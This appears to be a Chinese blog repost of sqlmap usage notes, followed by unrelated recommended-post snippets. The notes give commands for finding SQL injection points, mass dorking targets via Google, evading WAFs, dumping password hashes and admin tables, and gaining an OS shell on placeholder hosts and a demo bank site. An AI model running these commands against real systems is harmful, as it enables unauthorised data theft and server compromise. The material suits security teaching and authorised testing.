SQLmap 使用笔记

SQLMap实战技巧
最新推荐文章于 2023-05-23 18:12:54 发布
最新推荐文章于 2023-05-23 18:12:54 发布
阅读量818 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: python 数据库 php
原文链接:http://www.cnblogs.com/laofanshu/p/6940434.html

SQLMap 的常用语法

1.sqlmap.py -u "www.xxx.com/news.asp?id=1"// 检查注入点

2.sqlmap.py -u "www.xxx.com/news.asp?id=1" --current-user// 获取当前用户名

3.sqlmap.py -u "www.xxx.com/news.asp?id=1" --current-db//获取数据库名,得到库admin

4.sqlmap.py -u "www.xxx.com/news.asp?id=1" --privileges//权限判断

5.sqlmap.py -u "www.xxx.com/news.asp?id=1" --users//枚举管理系统用户

6.sqlmap.py -u "www.xxx.com/news.asp?id=1" --passwords//枚举管理系统用户哈希

7.sqlmap.py -u "www.xxx.com/news.asp?id=1" --tables -D "admin"//查admin库中的表名,得到user表

8.sqlmap.py -u "www.xxx.com/news.asp?id=1" --columns -T "user" -D "admin" -v 5//查字段,v后数字越大越详细,得到id,username,password

9.sqlmap.py -u "www.xxx.com/news.asp?id=1" --dump -C "id,username,password" -T "user" -D "admin" -v 5//拖库,或者使用--dump-all



10.--dbms "Mysql"//指定数据库类型

11.--dbs//列数据库

12.--passwords -U root//指定列数据库用户root的密码

13.--level 5//执行测试的等级

14.--user-agent "Googlebot/2.1"

15.--tamper "space2morehash.py"

以上为常用sqlmap命令,其他的请查阅手册。

  

sqlmap 借助 google 批量扫注入点

1.sqlmap.py -g "site:target.com inurl:asp"

2.如果要查询注入选y,跳过选n



注:大部分查询结果不存在注入

  sqlmap 利用编码绕过 WAF

通过不同编码,绕过WAF

1.sqlmap.py -u "www.xxx.com/news.asp?id=1" --dbs --tamper "space2morehash.py"//利用.py脚本改变编码,除了space2hash.py,还有base64encode.py、charencode.py等等,可查/usr/share/sqlmap/tamper

2.sqlmap.py --proxy http://127.0.0.1:8087 -u "www.xxx.com/news.asp?id=1" -v 3 –dbms “MySQL” --tamper "space2morehash.py" --referer "http://www.google.com" --user-agent "Googlebot/2.1"  //模拟google爬虫

  sqlmap post 注入

方法一:结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易。

1.浏览器打开目标地址 http://www.testfire.net/bank/login.aspx

2.配置burp代理(127.0.0.1:8080)以拦截请求

3.点击login表单的submit按钮

4.如下图,这时候Burp会拦截到了我们的登录POST请求

5.把这个post请求复制为txt, 我这命名为testfire.txt 然后把它放至c盘下

6.运行sqlmap并使用如下命令:sqlmap.py -r c:/testfire.txt -p uid,这里参数 -r 是让sqlmap加载我们的post请求testfire.txt,而 -p 为指定注入用的参数。

方法二:指定参数post注入

1.sqlmap.py -u "http://www.testfire.net/bank/login.aspx" --data "uid=Admin&passw=a&btnSubmit=Login"

 sqlmap cookies 注入

1.sqlmap.py -u "www.xxx.com/news.asp" --cookie "id=1" --current-db

2.sqlmap.py -u "www.xxx.com/news.asp" --cookie "id=1" --tables -D "admin"

......



注:注入时有可能存在连接线程数限制,线程设置不要太大

  sqlmap 执行 shell 命令

在数据库权限足够大的时候,可以使用cmd命令:

1.sqlmap.py -u "www.xxx.com/news.asp?id=1" --os-cmd=ipconfig//执行ipconfig命令

2.选取该web的脚本种类,此时为asp,选1

3.指定网站的根目录路径,如:d:\www\

 sqlmap获得一个shell

1.sqlmap.py -u "www.xxx.com/news.asp?id=1" --os-shell

2.选取该web的脚本种类,此时为asp,选1

3.指定网站的根目录路径,如:d:\www\

4.此时可以执行命令,并会在d:\www\下生成两个临时文件(tmpbxbxz.php/tmpuoiuz.php)

  sqlmap 伪静态注入

伪静态页面网址:www.xxx.com/index.php/Index/view/id/40.html

1.sqlmap.py -u "www.xxx.com/index.php/Index/view/id/40*.html" --dbs//在存在注入的地方加入*键

2.sqlmap.py -u "www.xxx.com/index.php/Index/view/id/40*.html" --tables -D "admin"

......

  sqlmap 延迟注入

某些网站有防注入保护,短时间内如果请求次数较多或短时间内请求错误页面次数较多都可能被网站屏蔽

1.sqlmap.py -u "www.xxx.com/index.php/Index/view/id/40*.html" --dbs --delay 5//间隔5秒请求一次

2.--safe-url//详细说明请查阅手册

3.--safe-freq//详细说明请查阅手册

  

转载于:https://www.cnblogs.com/laofanshu/p/6940434.html

nginx将xxx.com重定向到www.xxx.com配置
猿小白的博客
01-03 4万+
有时候,我们网站,需要将顶级域名xxx.com统一跳转到二级域名www.xxx.com下。这时候,我们可以通过修改nginx配置达到我们的目的。
sqlmap 使用笔记(kali环境)
最新发布
qq_40691438的博客
02-10 2481
sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:–当请求是HTTPS的时候,需要配合–force-ssl参数来使用,或者可以在Host头后面加上:443。在有些时候web服务器使用了伪静态,导致无法直接使用sqlmap测试参数,可以在想测试的参数后面加*用–os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。输出的格式可定义为:CSV,HTML,SQLITE。参数:–os-cmd,–os-shell。文件内容直接copy。
Fatal error: require(): Failed opening required ‘/www/wwwroot/xxxxxx/public/../thinkphp/start.php
热门推荐
WYXXXXXXXXX的博客
10-13 309万+
项目场景: 在CentOS8中安装了宝塔,配置thinkphp5.1版本环境时出了问题,在此之前网站虚拟域名成功配置,能够访问站点创建成功的页面 问题描述: 在访问tp5默认页面时报错 Warning: require(): open_basedir restriction in effect. File(/home/wwwroot/xxxxxx/thinkphp/start.php) is not within the allowed path(s): (/home/wwwroot/xxxxxx/pub
xxx5-12.rar_5XXX_XXX 12.com_XXx243_www.5xxx.com_xxx5
09-24
ajax 做的用户体验登录窗口,ajax 做的用户体验登录窗口
http://www.xxx.com/ skipped. Content of size 67099 was truncated to 59363
aa346359669的博客
01-07 159万+
如果提示http://www.xxx.com/ skipped. Content of size 67099 was truncated to 59363 在nutch-site.xml中添加: [code="java"] parser.skip.truncated false [/code] 这是因为网站的页面内容采用truncate的方式分段返回,而nutch...
java.net.UnknownHostException: www.xxx.com: Name or service not known的某种情况
九尾狐的yi巴的博客
01-05 87万+
我一般只记录不是网上给出的大众答案。 很明显很多人搜到的结论是: 修改服务器hosts文件: vi/etc/hosts 添加记录行: 127.0.0.1 www.xxx.com 这只是把这个无法识别的域名映射到本地了,有点掩耳盗铃。我是真的需要访问这个www.xxx.com提供的接口,所以不能用改host解决。 搜到的别的奇形怪状的解释我就不提了,我这里出现的问题是: 这个www.xxx.com的接口提供者要求使用https访问,并且给了我两个证书:Intermediate.crt和Roo...
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
sqlmap使用笔记1
08-03
本篇笔记将深入探讨sqlmap使用方法和功能,涵盖多个核心知识点。 1. **数据库版本探测**: 使用`-b`选项可以获取数据库版本信息,这对于识别潜在的漏洞和制定攻击策略至关重要。例如,针对不同的数据库版本,...
SQLMAP使用笔记全集
05-20
收录了SQLmap使用笔记使用方法,以及讲解实例,是学习使用sqlmap应用工具的好材料
sqlmap 使用笔记1
weixin_46259951的博客
05-15 488
sqlmap 使用笔记1 仅供学习参考 MySQL 数据库 实战靶场链接 SQL手工注入漏洞测试(MySQL数据库) sqlmap使用 先介绍本次使用的软件环境 图如果看不清的话可以看这里 .............. root@linux ..,;:ccc,. ---------- ......''';lxO.
xxx.com和www.xxx.com的区别
weixin_42613703的博客
12-22 88万+
XXX.com 是主域名! WWW.xxx.com 一般是域名的主页! 在很多情况下,会配置成一样!!! 也有可能,主域名不配置到具体的IP,可能无法解析。。 C:\Windows\system32&gt;nslookup baidu.com 服务器: UnKnown Address: 61.128.114.133 非权威应答: 名称: baidu.com Addresses: 22...
nginx对于XXX.com和XXX.com/index给映射到www.xxx.com的方式
fhb19870610的专栏
05-15 48万+
location / {             root    C:/website;             index   index.html index.htm index.php;             include C:/website/.htaccess; if ($host !~ "www.xincanzs.com") { rewrite
wwwxxx域名选择(www.xxx.com或者.cn)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-26 103万+
域名就是网站的网址,就跟家庭住址一样,那么域名就是我们网站的地址,我们使用方便记忆的域名(字母/数字+.COM等域名后缀:www.xxx.com)。 按所属机构分常见后缀形式: COM:商业性的机构/公司/个人,因为COM这个后缀公信度高,所以用得比较多 ORG :非盈利的组织、团体 GOV:政府部门 NET:从事Internet相关的的机构或公司 EDU:教育机构 .互联网通用顶级域之一,主要供教育机构,如大学等院校使用,实际使用的教育机构大部分位于美国。 注意:还有很多,但是不常见,就先不
在网址上输入www.xxx.com到返回界面给用户发生了什么?
weixin_51287642的博客
08-06 30万+
在网址上输入www.xxx.com到返回界面给用户发生了什么? DNS域名解析(https://blog.youkuaiyun.com/yanshuanche3765/article/details/82589210)–>tcp三次握手建立连接(https://blog.youkuaiyun.com/xy010902100449/article/details/48274635)–>向服务器发送http请求,请求html文件–>服务器返回一个html文件–>tcp四次握手释放连接–>游览器解释html
如何在本地设置www.xxx.com,使其允许访问
weixin_30429201的博客
04-21 20万+
1. 打开C:\Windows\System32\Drivers\etc 的hosts 文件 2. 在host文件写一行话: 192.168.1.40 www.xxx.com 3. 这样就可以打开 www.xxx.com 4. 若有开防火墙,须对端口开例外 转载于:https://www.cnblogs.com/kittyguo/p/5417744.html...
ThinkPHP下访问www.xxx.com访问成功www.xxx.com/后加上index、admin等报错
m0_37360025的博客
05-22 9万+
原因主要是Apache不支持.htaccess 1.httpd.conf,如果是多域名的要加上httpd-vhosts.conf Options FollowSymLinks AllowOverride None 改为: Options FollowSymLinks AllowOverride All 2. httpd.conf中开启LoadModule rewrite_module modules/mod_rewrite.so ...
未匹配到本域名(www.xxx.com)有效授权码,请到PbootCMS官网获取
糖果云专栏
05-23 15万+
PbootCMS默认授权提示语句为:未匹配到本域名(www.xxx.com)有效授权码,请到PbootCMS官网获取,并填写到网站后台"全局配置>>配置参数"中。
site:xxx.com和site:www.xxx.com的区别
python二级题库
03-21 9万+
 site:xxx.com和site:www.xxx.com的区别很多seo界的朋友都有这个疑问,就是在site:xxx.com和site:www.xxx.com的时候的结果不同,有的时候可能数量会差出很多。      这个问题如果仔细看过google的网站管理员的介绍的话会有所了解的,但是并不是非常的明显,而是用了另外一种表达方式:网站域名xxx.com和www.xxx.com这两种
网站带不带www真的不一样,很多新手不知道区别会被坑死的
weixin_42780754的博客
11-23 84万+
双 11 的时候我更换了新的服务器,把网站的重定向进行了修改,主要就是修改 www 的问题,把没有 www 的网址自动添加上 www,我本以为我最早做网站的时候加了 www 的重定向的,前两天才发现原来没有。今年9月5号的时候,Chrome 发布了新版本的 Chrome 69 浏览器,这个名称还挺 风流倜傥 的,但是它也惹了众怒,就是自动隐藏了网站的 www 前缀,幸亏它只是隐藏,如果是自动帮用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值